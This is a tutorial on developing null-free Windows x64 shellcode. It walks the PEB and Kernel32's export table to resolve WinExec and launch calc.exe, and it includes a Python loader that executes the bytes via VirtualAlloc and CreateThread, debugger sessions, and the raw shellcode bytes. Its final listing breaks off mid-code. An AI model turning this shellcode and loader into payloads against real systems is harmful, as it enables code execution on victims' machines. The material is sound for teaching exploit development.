Windows x64 Shellcode Development

In this article, we’re going to be looking at developing Windows x64 shellcode. The shellcode just aims to execute a command using the WinExec function.

Setting up a Development Environment

The following software will be required.

  • A computer or virtual machine running Windows 11
  • Python 3 64-bit (type python in a command prompt, and it should offer to install it)
  • Python keystone-engine (install with pip install keystone-engine)
  • WinDBG Preview (Available in the Microsoft store)
  • Visual Studio Code

Create a Python file and paste in the code listed below. The code does the following:

  • Uses keystone-engine to compile our assembly instructions.
  • Attaches WinDBG to our Python process, so we can examine the code being executed.
  • Copies the assembled bytes into executable memory allocated with VirtualAlloc, and runs them in a new thread.

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

def main():
    SHELLCODE = (
        " start: "
        "   int3;"                       # Breakpoint
        "   nop;"
        "   nop;"
        "   nop;"
    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode


    shellcode = bytearray(sh)
    print("Shellcode: " + output )

    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlMoveMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

if __name__ == "__main__":
    main()

Required Steps

These tasks need to be carried out for the shellcode to execute.

Locating the Kernel32 Base Address

To do anything useful with our shellcode, we need to be able to call Windows functions. The majority of this functionality is found in Kernel32.dll. This DLL will be mapped into an application's virtual address space.

By examining the process's Process Environment Block (PEB), we can determine the base addresses of mapped libraries. This requires traversing the ProcessEnvironmentBlock>Ldr>InMemoryOrderModuleList data structure.

The exact offsets can be determined using WinDBG. From the output below, we can see the pointer to the PEB is stored at offset 0x60 in the Thread Environment Block (TEB), which the GS register points to in 64-bit processes. Ldr is at offset 0x18 from the PEB, and InMemoryOrderModuleList is at offset 0x20 from Ldr. The first entry in this list is the executable itself, typically followed by ntdll.dll and then Kernel32, so we only need to follow the first couple of links in the list.

0:004> dt nt!_TEB @$teb
ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : (null) 
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : (null) 
   +0x058 ThreadLocalStoragePointer : 0x0000014e`24825aa0 Void
   +0x060 ProcessEnvironmentBlock : 0x00000004`1a630000 _PEB
<SNIP>
0:004> dx -r1 ((ntdll!_PEB *)0x41a630000)
((ntdll!_PEB *)0x41a630000)                 : 0x41a630000 [Type: _PEB *]
    [+0x000] InheritedAddressSpace : 0x0 [Type: unsigned char]
    [+0x001] ReadImageFileExecOptions : 0x0 [Type: unsigned char]
    [+0x002] BeingDebugged    : 0x1 [Type: unsigned char]
    [+0x003] BitField         : 0x84 [Type: unsigned char]
    [+0x003 ( 0: 0)] ImageUsesLargePages : 0x0 [Type: unsigned char]
    [+0x003 ( 1: 1)] IsProtectedProcess : 0x0 [Type: unsigned char]
    [+0x003 ( 2: 2)] IsImageDynamicallyRelocated : 0x1 [Type: unsigned char]
    [+0x003 ( 3: 3)] SkipPatchingUser32Forwarders : 0x0 [Type: unsigned char]
    [+0x003 ( 4: 4)] IsPackagedProcess : 0x0 [Type: unsigned char]
    [+0x003 ( 5: 5)] IsAppContainer   : 0x0 [Type: unsigned char]
    [+0x003 ( 6: 6)] IsProtectedProcessLight : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 7)] IsLongPathAwareProcess : 0x1 [Type: unsigned char]
    [+0x004] Padding0         [Type: unsigned char [4]]
    [+0x008] Mutant           : 0xffffffffffffffff [Type: void *]
    [+0x010] ImageBaseAddress : 0x7ff715e00000 [Type: void *]
    [+0x018] Ldr              : 0x7ffb6483c4c0 [Type: _PEB_LDR_DATA *]
<SNIP>
0:004> dx -r1 ((ntdll!_PEB_LDR_DATA *)0x7ffb6483c4c0)
((ntdll!_PEB_LDR_DATA *)0x7ffb6483c4c0)                 : 0x7ffb6483c4c0 [Type: _PEB_LDR_DATA *]
    [+0x000] Length           : 0x58 [Type: unsigned long]
    [+0x004] Initialized      : 0x1 [Type: unsigned char]
    [+0x008] SsHandle         : 0x0 [Type: void *]
    [+0x010] InLoadOrderModuleList [Type: _LIST_ENTRY]
    [+0x020] InMemoryOrderModuleList [Type: _LIST_ENTRY]
<SNIP>

The assembly code below will perform the above traversal, and place the Kernel32 base address in the RBX and R8 registers.

        " start: "
        "  sub rsp, 0x208;"                 # Make some room on the stack

        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

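The traversal can be modelled in plain Python to see why two list hops followed by a read at offset 0x20 land on the Kernel32 base address. This is only a sketch over a simulated memory dictionary: every address is made up, the ntdll base is hypothetical, and the module order (executable, ntdll, Kernel32) is the typical one rather than a guarantee. The offsets 0x10 (InMemoryOrderLinks) and 0x30 (DllBase) are those of the 64-bit LDR_DATA_TABLE_ENTRY structure.

```python
# Simulated memory: address -> 64-bit value. All addresses are hypothetical.
memory = {}

LDR = 0x1000                  # pretend address of PEB_LDR_DATA
IN_MEMORY_ORDER_LIST = 0x20   # offset of InMemoryOrderModuleList in PEB_LDR_DATA
IN_MEMORY_ORDER_LINKS = 0x10  # offset of InMemoryOrderLinks in LDR_DATA_TABLE_ENTRY
DLL_BASE = 0x30               # offset of DllBase in LDR_DATA_TABLE_ENTRY

# (name, entry address, DllBase) in the assumed load order.
modules = [
    ("python.exe",   0x2000, 0x7FF715E00000),
    ("ntdll.dll",    0x3000, 0x7FFB64700000),
    ("KERNEL32.DLL", 0x4000, 0x7FFB62E90000),
]

# Build the circular list: head -> exe -> ntdll -> kernel32 -> head.
links = [LDR + IN_MEMORY_ORDER_LIST]
links += [addr + IN_MEMORY_ORDER_LINKS for _, addr, _ in modules]
for current, following in zip(links, links[1:] + links[:1]):
    memory[current] = following          # Flink pointer
for _, addr, base in modules:
    memory[addr + DLL_BASE] = base

# Mirror the assembly instruction by instruction.
rax = LDR
rsi = memory[rax + 0x20]   # mov rsi, [rax + 0x20] -> links of entry 1 (the executable)
rax = memory[rsi]          # lodsq                 -> links of entry 2 (ntdll)
rax, rsi = rsi, rax        # xchg rax, rsi
rax = memory[rsi]          # lodsq                 -> links of entry 3 (Kernel32)
rbx = memory[rax + 0x20]   # mov rbx, [rax + 0x20] -> DllBase (0x30 - 0x10 = 0x20)

print(hex(rbx))
```

Because the list pointers address the InMemoryOrderLinks field rather than the start of each entry, DllBase sits 0x20 bytes past the pointer instead of 0x30.
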
Parsing the Kernel32 Export Address Table

So, we know the base address of Kernel32. Next, we need to determine the addresses of the functions we want to call. We can do this by parsing the DLL’s Export Address Table, which lists the functions it provides. The structure that describes it is shown below.

    public struct IMAGE_EXPORT_DIRECTORY
    {
        public UInt32 Characteristics;
        public UInt32 TimeDateStamp;
        public UInt16 MajorVersion;
        public UInt16 MinorVersion;
        public UInt32 Name;
        public UInt32 Base;
        public UInt32 NumberOfFunctions;      // Total number of exported functions
        public UInt32 NumberOfNames;          // Number of functions exported by name
        public UInt32 AddressOfFunctions;     // RVA of the array of function RVAs
        public UInt32 AddressOfNames;         // RVA of the array of function name RVAs
        public UInt32 AddressOfNameOrdinals;  // RVA of the array of name ordinals
    }

We can find the location of the Export Address Table by first determining the offset to the PE signature. This offset is stored in the e_lfanew field, which always exists at offset 0x03c from the base address of the executable.

dt -n _IMAGE_DOS_HEADER
ntdll!_IMAGE_DOS_HEADER
<snip>
   +0x03c e_lfanew         : Int4B

We can examine the Export Address Table using WinDBG. The following shows the RVA and size of the export directory.

0:004> !dh kernel32 -f

File Type: DLL
FILE HEADER VALUES
    8664 machine (X64)
       7 number of sections
<SNIP>
    4160  DLL characteristics
            High entropy VA supported
            Dynamic base
            NX compatible
            Guard
   9A2E0 [    DF0C] address [size] of Export Directory
 <SNIP>

Viewing the contents of the export table with the display type (dt) command shows the offsets we’re interested in. .symopt-0x100 clears the SYMOPT_NO_UNQUALIFIED_LOADS option, so the debugger is allowed to load symbols when resolving the unqualified type name.

0:004> .symopt
0:004> .symopt-0x100
0:004> dt _IMAGE_EXPORT_DIRECTORY kernel32+9A2E0
ole32!_IMAGE_EXPORT_DIRECTORY
   +0x000 Characteristics  : 0
   +0x004 TimeDateStamp    : 0x73bb7c6b
   +0x008 MajorVersion     : 0
   +0x00a MinorVersion     : 0
   +0x00c Name             : 0x9e2d2
   +0x010 Base             : 1
   +0x014 NumberOfFunctions : 0x661
   +0x018 NumberOfNames    : 0x661
   +0x01c AddressOfFunctions : 0x9a308
   +0x020 AddressOfNames   : 0x9bc8c
   +0x024 AddressOfNameOrdinals : 0x9d610
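As a cross-check on these offsets, the same layout can be described with Python's struct module. The sketch below packs the field values from the dt output above into a 40-byte buffer and unpacks them again; the format string and the field_offset helper are illustrative names, not part of any Windows API.

```python
import struct

# Little-endian layout of IMAGE_EXPORT_DIRECTORY: I = 4 bytes, H = 2 bytes.
EXPORT_DIRECTORY_FORMAT = "<IIHHIIIIIII"
FIELDS = (
    "Characteristics", "TimeDateStamp", "MajorVersion", "MinorVersion",
    "Name", "Base", "NumberOfFunctions", "NumberOfNames",
    "AddressOfFunctions", "AddressOfNames", "AddressOfNameOrdinals",
)

# Values copied from the WinDBG output above.
raw = struct.pack(
    EXPORT_DIRECTORY_FORMAT,
    0, 0x73BB7C6B, 0, 0, 0x9E2D2, 1, 0x661, 0x661, 0x9A308, 0x9BC8C, 0x9D610,
)
export_dir = dict(zip(FIELDS, struct.unpack(EXPORT_DIRECTORY_FORMAT, raw)))


def field_offset(name):
    """Return the byte offset of a field by sizing the fields before it."""
    index = FIELDS.index(name)
    return struct.calcsize(EXPORT_DIRECTORY_FORMAT[: index + 1])


for name in ("NumberOfFunctions", "AddressOfFunctions",
             "AddressOfNames", "AddressOfNameOrdinals"):
    print(f"{name:24} +0x{field_offset(name):03x} = 0x{export_dir[name]:x}")
```

The computed offsets (0x14, 0x1c, 0x20 and 0x24) are the ones used as displacements from RDX in the assembly later in the article.
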

Dumping the string at the Name RVA shows we’re dealing with the right DLL.

0:004> da kernel32+0x9e2d2
00007ffb`62f2e2d2  "KERNEL32.dll"

Dumping the AddressOfNames RVA gives us an array of RVAs, each pointing to the name of an exported function:

0:004> dd kernel32+0x9bc8c
00007ffb`62f2bc8c  0009e2df 0009e318 0009e34b 0009e35a
00007ffb`62f2bc9c  0009e36f 0009e378 0009e381 0009e392
00007ffb`62f2bcac  0009e3a3 0009e3e8 0009e40e 0009e42d
00007ffb`62f2bcbc  0009e44c 0009e459 0009e46c 0009e484
00007ffb`62f2bccc  0009e49f 0009e4b4 0009e4d1 0009e510
00007ffb`62f2bcdc  0009e551 0009e564 0009e571 0009e58b
00007ffb`62f2bcec  0009e5a9 0009e5e0 0009e625 0009e670
00007ffb`62f2bcfc  0009e6cb 0009e720 0009e773 0009e7c8

0:004> da kernel32+0009e2df
00007ffb`62f2e2df  "AcquireSRWLockExclusive"
0:004> da kernel32+0009e318
00007ffb`62f2e318  "AcquireSRWLockShared"

The offsets can be followed manually to find the number of exported functions, as shown below.

# Get the offset of the PE signature (e_lfanew)
0:008> dd kernel32+0x3c L1
00007ffe`a377003c  000000f8

# Get the RVA of the Export Address Table (data directory entry at PE signature + 0x88)
0:008> dd kernel32+0xf8+0x88 L1
00007ffe`a3770180  000980a0

# Get NumberOfFunctions (offset 0x14 from the start of the export directory, not from the data directory entry)
0:008> dd kernel32+0x980a0+0x14 L1

# The dword returned is the number of functions exported by Kernel32.
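The same two reads can be sketched in Python against a byte buffer. The helper name export_directory_rva and the synthetic header below are assumptions made for illustration; only the e_lfanew value (0xf8) and the export RVA (0x980a0) come from the session above. The 0x88 displacement is the 4-byte signature, plus the 0x14-byte file header, plus 0x70 bytes into the 64-bit (PE32+) optional header where the data directory starts.

```python
import struct

E_LFANEW_OFFSET = 0x3C
# 4 (PE signature) + 0x14 (file header) + 0x70 (DataDirectory within the PE32+ optional header)
EXPORT_ENTRY_OFFSET = 4 + 0x14 + 0x70


def export_directory_rva(image: bytes) -> int:
    """Follow e_lfanew to the PE signature, then read the export directory RVA."""
    (e_lfanew,) = struct.unpack_from("<I", image, E_LFANEW_OFFSET)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    (rva,) = struct.unpack_from("<I", image, e_lfanew + EXPORT_ENTRY_OFFSET)
    return rva


# Synthetic header holding only the fields the walk touches.
image = bytearray(0x200)
image[0:2] = b"MZ"
struct.pack_into("<I", image, E_LFANEW_OFFSET, 0xF8)
image[0xF8:0xFC] = b"PE\x00\x00"
struct.pack_into("<I", image, 0xF8 + EXPORT_ENTRY_OFFSET, 0x980A0)

print(hex(export_directory_rva(bytes(image))))
```

Fields inside the export directory, such as NumberOfFunctions at offset 0x14, are then read relative to the image base plus this RVA.
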

We can implement similar logic in assembly to follow the offsets.

       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get offset of the Kernel32 PE signature (e_lfanew, offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add dereferenced signature offset to kernel32 base. Store in RBX.
        "   mov edx, [rbx+0x88];"           # Offset from PE signature to the Export Address Table RVA
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA

Lookup the WinExec Function Name

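Next, we just need to loop over the AddressOfNames list. The code takes the length of the list from the NumberOfFunctions field; strictly speaking, the list holds NumberOfNames entries, but both fields hold the same value (0x661) in the dump above. Once we have found the function we are looking for, we keep its index in RCX and continue execution.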

        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
        "   mov rax, 0x00636578456E6957;"   # WinExec          
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"

        "FunctionNameFound: "
        "  nop;"

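The 64-bit constant compared against each name is simply the string "WinExec" plus its null terminator, read as a little-endian integer. A short Python sketch shows the derivation; first_qword is a hypothetical helper, and "WinExecEx" is a made-up name used only to show what the terminator buys us.

```python
def first_qword(name: bytes) -> int:
    """Return the first 8 bytes of a name as a little-endian integer."""
    return int.from_bytes(name[:8].ljust(8, b"\x00"), "little")


target = first_qword(b"WinExec\x00")
print(hex(target))

# A longer name with the same prefix does not match, because the eighth
# byte of the comparison is the null terminator of "WinExec".
lookalike = first_qword(b"WinExecEx\x00")
print(target == lookalike)
```

Since the name is exactly seven characters, the terminator fits in the same qword and a single cmp is enough; a longer function name would need more than one comparison.
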
Finding the WinExec Address

The position at which we found the function name in the list remains stored in the RCX register. Next, we look up the function ordinal based on this index. An ordinal is just the identifier for a function within a DLL. We could have performed a lookup based on this, rather than the function name. However, this value could change in future DLL releases.

        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter

With the function ordinal value, we can finally look up the WinExec address from AddressOfFunctions.

        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"

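The relationship between the three export tables can be sketched in Python. The tables below are tiny, made-up stand-ins (the RVAs and the ordinal ordering are hypothetical), and resolve_export is an illustrative helper that follows the documented name, ordinal, function chain rather than mirroring the index arithmetic of the assembly instruction by instruction.

```python
def resolve_export(target, names, name_ordinals, functions, image_base):
    """Resolve a name via AddressOfNames -> AddressOfNameOrdinals -> AddressOfFunctions."""
    for index, name in enumerate(names):
        if name == target:
            ordinal = name_ordinals[index]         # same index as the name
            return image_base + functions[ordinal]  # ordinal indexes the function table
    return None


# Hypothetical tables; real ones are read from the export directory.
names = ["AcquireSRWLockExclusive", "AcquireSRWLockShared", "WinExec"]
name_ordinals = [2, 0, 1]
functions = [0x1000, 0x2000, 0x3000]
image_base = 0x7FFB62E90000

address = resolve_export("WinExec", names, name_ordinals, functions, image_base)
print(hex(address))
```

The name table and the ordinal table are parallel arrays, which is why the index found during the name search can be reused directly to fetch the ordinal.
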
Call WinExec

Now, with the function address stored in the R14 register, we can call WinExec. The function is pretty simple to call. Below is the method signature.

UINT WinExec(
  [in] LPCSTR lpCmdLine,
  [in] UINT   uCmdShow
);

With 64-bit code, the first four function parameters are passed in registers rather than on the stack (RCX, RDX, R8 and R9 specifically). In this instance, we only need to set RCX to a pointer to the command we want to execute, and set RDX (uCmdShow) to 1 so our new window is visible.

       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

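The stack adjustments in this listing also keep RSP 16-byte aligned at the point of the call, which the Windows x64 calling convention expects, and the final sub rsp, 0x20 reserves the 32 bytes of shadow space a callee may use. The arithmetic can be checked with a small Python sketch. It assumes the shellcode is entered like an ordinary function, so RSP starts 8 bytes off a 16-byte boundary; the starting value and the simulate helper are hypothetical.

```python
def simulate(rsp, operations):
    """Apply a sequence of stack operations and return the final RSP."""
    for op, value in operations:
        if op == "sub":
            rsp -= value
        elif op == "push":
            rsp -= 8  # each push stores one qword
        else:
            raise ValueError(f"unknown operation: {op}")
    return rsp


entry_rsp = 0x10008  # hypothetical; 8 bytes off a 16-byte boundary

operations = [
    ("sub", 0x208),   # sub rsp, 0x208
    ("push", None),   # push rax (null terminator)
    ("push", None),   # push rax ("calc.exe")
    ("sub", 0x20),    # sub rsp, 0x20 (shadow space)
]

rsp_at_call = simulate(entry_rsp, operations)
print(hex(rsp_at_call), rsp_at_call % 16 == 0)
```

An odd number of pushes would leave RSP misaligned by 8 bytes, which matters later when the command string is pushed in a variable number of chunks.
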
Executing the code should now run calc.exe, and our shellcode will be output on the command line.

PS C:\Users\user\Desktop> python .\shellcode.py
Shellcode: \x48\x81\xec\x08\x02\x00\x00\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\xad\x48\x96\x48\xad\x48\x8b\x58\x20\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00\x00\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x67\xe3\x1c\x31\xdb\x41\x8b\x5c\x8b\x04\x4c\x01\xc3\x48\xff\xc9\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x00\x48\x39\x03\x75\xe1\x4d\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x44\xab\x04\x4c\x01\xc0\x49\x89\xc6\x48\x31\xc0\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x20\x41\xff\xd6
Bytes: 169
Attaching debugger to 9540
Press any key to continue...

Removing Null Bytes

The above shellcode includes null bytes (0x00), which will prevent it from being used in most memory corruption exploits, since string copy functions stop at the first null byte. Let’s fix that.

The first problematic instruction is sub rsp:

48 81 ec 08 02 00 00 sub rsp,0x208

To avoid this, we can add a negative value to rsp.

0:008> ? 0 - 0x208
Evaluate expression: -520 = ffffffff`fffffdf8

The resulting null-free instruction is:

add rsp, 0xfffffffffffffdf8;
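The reason this works is visible in how the 32-bit immediate is encoded. A minimal Python sketch (imm32_bytes is an illustrative helper) packs both values as little-endian signed 32-bit integers, which is the form the immediate takes in the instruction bytes shown above.

```python
import struct


def imm32_bytes(value: int) -> bytes:
    """Encode a signed 32-bit immediate as little-endian bytes."""
    return struct.pack("<i", value)


positive = imm32_bytes(0x208)    # immediate used by sub rsp, 0x208
negative = imm32_bytes(-0x208)   # immediate used by the add form

print(positive.hex(" "), "contains null:", 0 in positive)
print(negative.hex(" "), "contains null:", 0 in negative)

# The 64-bit view of the same negative number, as printed by WinDBG.
as_u64 = -0x208 & 0xFFFFFFFFFFFFFFFF
print(hex(as_u64))
```

Small positive values always carry zero padding in their upper bytes, whereas the two's complement form of a small negative value is padded with 0xff.
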

The next issue is the following instruction.

8b 93 88 00 00 00       mov    edx,DWORD PTR [rbx+0x88]

To remove the null bytes, we can load a larger value than necessary, then perform a bit shift operation to discard the unwanted low bits.

0:008> ? 0x88FFFFF >> 0x14
Evaluate expression: 136 = 00000000`00000088

"   xor r12,r12;"
"   add r12, 0x88FFFFF;"
"   shr r12, 0x14;"
"   mov edx, [rbx+r12];"

The final problematic instruction is our WinExec string with a null terminator.

63: 48 b8 57 69 6e 45 78    movabs rax,0x636578456e6957
6a: 65 63 00

Once again, we can use a bit shift operation to address this.

0:009> ? 0x636578456E6957FF >> 8
Evaluate expression: 27977589929699671 = 00636578`456e6957

"   mov rax, 0x636578456E6957FF;"   # WinExec
"   shr rax, 0x8;"

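Both shift tricks, and the null bytes they remove, can be checked with a few lines of Python. The byte strings are the three instruction encodings quoted above; null_offsets is an illustrative helper, not part of the article's tooling.

```python
def null_offsets(data: bytes) -> list:
    """Return the offsets of every 0x00 byte in an encoded instruction."""
    return [offset for offset, byte in enumerate(data) if byte == 0]


problem_instructions = {
    "sub rsp, 0x208":               bytes.fromhex("4881ec08020000"),
    "mov edx, [rbx+0x88]":          bytes.fromhex("8b9388000000"),
    "movabs rax, 0x636578456e6957": bytes.fromhex("48b857696e4578656300"),
}
for text, encoding in problem_instructions.items():
    print(f"{text:30} nulls at {null_offsets(encoding)}")

# The padded immediates contain no null bytes...
padded_offset = (0x88FFFFF).to_bytes(4, "little")
padded_name = (0x636578456E6957FF).to_bytes(8, "little")
print(null_offsets(padded_offset), null_offsets(padded_name))

# ...and shifting them right recovers the original values.
print(hex(0x88FFFFF >> 0x14), hex(0x636578456E6957FF >> 8))
```

Running the same helper over the full assembled output is a quick way to confirm that no other instruction reintroduces a null byte after further changes.
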
Finished Code Listing

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

#####################################################################################
# ██████╗░░█████╗░██████╗░██████╗░███████╗██████╗░░██████╗░░█████╗░████████╗███████╗#
# ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔════╝░██╔══██╗╚══██╔══╝██╔════╝#
# ██████╦╝██║░░██║██████╔╝██║░░██║█████╗░░██████╔╝██║░░██╗░███████║░░░██║░░░█████╗░░#
# ██╔══██╗██║░░██║██╔══██╗██║░░██║██╔══╝░░██╔══██╗██║░░╚██╗██╔══██║░░░██║░░░██╔══╝░░#
# ██████╦╝╚█████╔╝██║░░██║██████╔╝███████╗██║░░██║╚██████╔╝██║░░██║░░░██║░░░███████╗#
# ╚═════╝░░╚════╝░╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝░╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░╚══════╝#
#####################################################################################
#                                                                                   #
#                        x64 Null Free WinExec Shellcode                            #
#####################################################################################

def main():
    SHELLCODE = (
        " start: "
        #" int3;"
        #"  sub rsp, 0x208;"                # Make some room on the stack (NULL BYTE)
        "  add rsp, 0xfffffffffffffdf8;"    # Avoid Null Byte
        " locate_kernel32:"
        "   xor rcx, rcx;"                  # Zero RCX contents
        "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
        "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
        "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
        "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
        "   xchg rax, rsi;"                 # Swap RAX,RSI
        "   lodsq;"                         # Load qword at address (R)SI into RAX
        "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
        "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

       # Code for parsing Export Address Table
        "   mov ebx, [rbx+0x3C]; "          # Get offset of the Kernel32 PE signature (e_lfanew, offset 0x3C) into EBX
        "   add rbx, r8; "                  # Add dereferenced signature offset to kernel32 base. Store in RBX.
       # "   mov edx, [rbx+0x88];"          # Offset from PE32 Signature to Export Address Table (NULL BYTE)
        "   xor r12,r12;"
        "   add r12, 0x88FFFFF;"
        "   shr r12, 0x14;"
        "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
        
        "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
        "   mov r10d, [rdx+0x14];"          # Number of functions
        "   xor r11, r11;"                  # Zero R11 before use
        "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
        "   add r11, r8;"                   # AddressOfNames VMA

        # Loop over Export Address Table to find WinExec name
        "   mov rcx, r10;"                  # Set loop counter
        "kernel32findfunction: "
        " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
        "   xor ebx,ebx;"                   # Zero EBX for use
        "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
        "   add rbx, r8;"                   # RBX = Function name VMA
        "   dec rcx;"                       # Decrement our loop by one
      # "   mov rax, 0x00636578456E6957;"   # WinExec (NULL BYTE)      
        "   mov rax, 0x636578456E6957FF;"   # WinExec
        "   shr rax, 0x8;"
        "   cmp [rbx], rax;"                # Check if we found WinExec
        "   jnz kernel32findfunction;"

        "FunctionNameFound: "
        # We found our target
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
        "   add r11, r8;"                   # AddressOfNameOrdinals VMA
        # Get the function ordinal from AddressOfNameOrdinals
        "   inc rcx;"
        "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
        # Get function address from AddressOfFunctions
        "   xor r11, r11;"
        "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
        "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
        "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
        "   add rax, r8;"                   # Add base address to function RVA
        "   mov r14, rax;"

       # WinExec Call
        "  xor rax, rax;"                   # Zero RAX to become a null byte
        "  push rax;"                       # Push the null byte to the stack
        "  mov rax, 0x6578652E636C6163;"    # Add calc.exe string to RAX.
        "  push rax;"                       # Push RAX to stack
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

    )

    # Initialize engine in 64-Bit mode
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    instructions, count = ks.asm(SHELLCODE)

    sh = b""
    output = ""
    for opcode in instructions:
        sh += struct.pack("B", opcode)                          # To encode for execution
